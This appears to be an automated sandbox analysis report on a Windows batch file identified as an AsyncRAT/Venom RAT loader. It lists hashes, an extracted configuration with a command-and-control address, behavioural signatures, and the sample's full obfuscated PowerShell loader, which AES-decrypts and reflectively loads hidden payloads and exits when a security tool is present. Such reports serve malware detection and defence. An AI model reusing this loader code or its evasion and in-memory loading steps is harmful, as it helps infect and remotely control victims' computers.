Analysis
-
max time kernel
136s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
09-05-2024 01:08
Static task
static1
Behavioral task
behavioral1
Sample
1331ae5fedc50718ee7ae4f73735ac7ca34e3756f3c75c843c8676a9f3db33ad.bat
Resource
win7-20240220-en
General
-
Target
1331ae5fedc50718ee7ae4f73735ac7ca34e3756f3c75c843c8676a9f3db33ad.bat
-
Size
65KB
-
MD5
963ce568ecee6a43389e1e12b60f325a
-
SHA1
2cbf2183bf67d7d2eeb98366ab9702e23e4d7c30
-
SHA256
1331ae5fedc50718ee7ae4f73735ac7ca34e3756f3c75c843c8676a9f3db33ad
-
SHA512
18c2c8dd7a1336cbd18c1d0e6659f47a8718492f37c1224c3348391b97b3c15e74108e293f2777323cec7bde6a645243a409d2d000b9b94bc7b71d4ee7ae8554
-
SSDEEP
1536:BNnIoXnDA1Chiapd336sy2r0z1k7Ew2Gr1lwtnLYT8ki:BRIGAA336sy2rSk7Ew2Gr1lKT
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
193.222.96.143:4449
bkfcocpkfci
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2568-34-0x000001E26B570000-0x000001E26B588000-memory.dmp family_asyncrat -
Detects executables attemping to enumerate video devices using WMI 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2568-34-0x000001E26B570000-0x000001E26B588000-memory.dmp INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 23 2568 powershell.exe 24 2568 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 2568 powershell.exe 2568 powershell.exe 436 powershell.exe 436 powershell.exe 2568 powershell.exe 2568 powershell.exe 2568 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 436 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 2568 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 4252 wrote to memory of 3064 4252 cmd.exe cmd.exe PID 4252 wrote to memory of 3064 4252 cmd.exe cmd.exe PID 3064 wrote to memory of 4152 3064 cmd.exe cmd.exe PID 3064 wrote to memory of 4152 3064 cmd.exe cmd.exe PID 3064 wrote to memory of 2568 3064 cmd.exe powershell.exe PID 3064 wrote to memory of 2568 3064 cmd.exe powershell.exe PID 2568 wrote to memory of 436 2568 powershell.exe powershell.exe PID 2568 wrote to memory of 436 2568 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1331ae5fedc50718ee7ae4f73735ac7ca34e3756f3c75c843c8676a9f3db33ad.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\1331ae5fedc50718ee7ae4f73735ac7ca34e3756f3c75c843c8676a9f3db33ad.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1331ae5fedc50718ee7ae4f73735ac7ca34e3756f3c75c843c8676a9f3db33ad.bat';$BMbC='RsHpUesHpUadLsHpUinsHpUesHpUssHpU'.Replace('sHpU', ''),'CCFZsreCFZsatCFZseDCFZsecCFZsrCFZsyCFZspCFZstCFZsorCFZs'.Replace('CFZs', ''),'FrBDpromBDprBBDpraBDprseBDpr6BDpr4SBDprtrBDpriBDprngBDpr'.Replace('BDpr', ''),'ChAmxTanAmxTgAmxTeEAmxTxtAmxTensAmxTiAmxTonAmxT'.Replace('AmxT', ''),'DMtvCecMtvComMtvCprMtvCeMtvCsMtvCsMtvC'.Replace('MtvC', ''),'LCapfoaCapfdCapf'.Replace('Capf', ''),'ISAmunSAmuvokSAmueSAmu'.Replace('SAmu', ''),'MawqArinMwqArowqArduwqArlewqAr'.Replace('wqAr', ''),'GetKwgmCuKwgmrreKwgmntKwgmPKwgmrocKwgmessKwgm'.Replace('Kwgm', ''),'SplMBlVitMBlV'.Replace('MBlV', ''),'ElayXCemayXCeayXCnayXCtayXCAtayXC'.Replace('ayXC', ''),'TVQktranVQktsVQktforVQktmFiVQktnaVQktlVQktBVQktloVQktcVQktkVQkt'.Replace('VQkt', ''),'EnXNnYtXNnYrXNnYyPoXNnYintXNnY'.Replace('XNnY', ''),'ComQwwpyTmQwwomQww'.Replace('mQww', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BMbC[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zlGLC($RSWKX){$GVeOl=[System.Security.Cryptography.Aes]::Create();$GVeOl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GVeOl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GVeOl.Key=[System.Convert]::($BMbC[2])('uY6F5j209xASZjaoUU93vCCXVRY+Y6fGH5LCH0uNzYo=');$GVeOl.IV=[System.Convert]::($BMbC[2])('iwvv8vpAhw35q7w8nU7OXw==');$QznTD=$GVeOl.($BMbC[1])();$RHHCU=$QznTD.($BMbC[11])($RSWKX,0,$RSWKX.Length);$QznTD.Dispose();$GVeOl.Dispose();$RHHCU;}function lfrrO($RSWKX){$kKatK=New-Object System.IO.MemoryStream(,$RSWKX);$EyOwi=New-Object System.IO.MemoryStream;$oJtRR=New-Object System.IO.Compression.GZipStream($kKatK,[IO.Compression.CompressionMode]::($BMbC[4]));$oJtRR.($BMbC[13])($EyOwi);$oJtRR.Dispose();$kKatK.Dispose();$EyOwi.Dispose();$EyOwi.ToArray();}$FYWBz=[System.IO.File]::($BMbC[0])([Console]::Title);$QpMEc=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 5).Substring(2))));$IyoFy=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 6).Substring(2))));[System.Reflection.Assembly]::($BMbC[5])([byte[]]$IyoFy).($BMbC[12]).($BMbC[6])($null,$null);[System.Reflection.Assembly]::($BMbC[5])([byte[]]$QpMEc).($BMbC[12]).($BMbC[6])($null,$null); "3⤵PID:4152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgptjzmy.ccx.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/436-24-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmpFilesize
10.8MB
-
memory/436-29-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmpFilesize
10.8MB
-
memory/436-26-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmpFilesize
10.8MB
-
memory/436-25-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmpFilesize
10.8MB
-
memory/2568-12-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmpFilesize
10.8MB
-
memory/2568-34-0x000001E26B570000-0x000001E26B588000-memory.dmpFilesize
96KB
-
memory/2568-13-0x000001E26B5A0000-0x000001E26B5E4000-memory.dmpFilesize
272KB
-
memory/2568-0-0x00007FF8C0683000-0x00007FF8C0685000-memory.dmpFilesize
8KB
-
memory/2568-11-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmpFilesize
10.8MB
-
memory/2568-6-0x000001E26B070000-0x000001E26B092000-memory.dmpFilesize
136KB
-
memory/2568-30-0x000001E26B550000-0x000001E26B55A000-memory.dmpFilesize
40KB
-
memory/2568-14-0x000001E26C3E0000-0x000001E26C456000-memory.dmpFilesize
472KB
-
memory/2568-33-0x000001E26B560000-0x000001E26B570000-memory.dmpFilesize
64KB
-
memory/2568-32-0x00007FF8DC6C0000-0x00007FF8DC77E000-memory.dmpFilesize
760KB
-
memory/2568-31-0x00007FF8DE670000-0x00007FF8DE865000-memory.dmpFilesize
2.0MB
-
memory/2568-40-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmpFilesize
10.8MB
-
memory/2568-41-0x00007FF8C0683000-0x00007FF8C0685000-memory.dmpFilesize
8KB
-
memory/2568-42-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmpFilesize
10.8MB